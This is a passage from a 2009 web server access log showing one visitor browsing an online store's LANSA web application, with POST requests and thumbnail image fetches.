72.85.231.187 - - [28/Oct/2009:08:08:27 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L014F905F2B301600F5F9013+M37+ENG HTTP/1.1" 200 70150 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L014F90592290B600F529013+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
72.85.231.187 - - [28/Oct/2009:08:08:28 -0400] "GET /images/items/0011540_THUMB.JPG HTTP/1.1" 200 785 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L014F905F2B301600F5F9013+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
72.85.231.187 - - [28/Oct/2009:08:08:28 -0400] "GET /images/previous_white.gif HTTP/1.1" 200 253 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L014F905F2B301600F5F9013+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
72.85.231.187 - - [28/Oct/2009:08:08:28 -0400] "GET /images/items/0030330_THUMB.JPG HTTP/1.1" 200 2621 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L014F905F2B301600F5F9013+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
72.85.231.187 - - [28/Oct/2009:08:08:43 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L014F915920A006001619013+M37+ENG HTTP/1.1" 200 70515 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L014F905F2B301600F5F9013+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
72.85.231.187 - - [28/Oct/2009:08:08:44 -0400] "GET /images/items/0034302_THUMB.JPG HTTP/1.1" 404 228 "http://www.aceonlinesto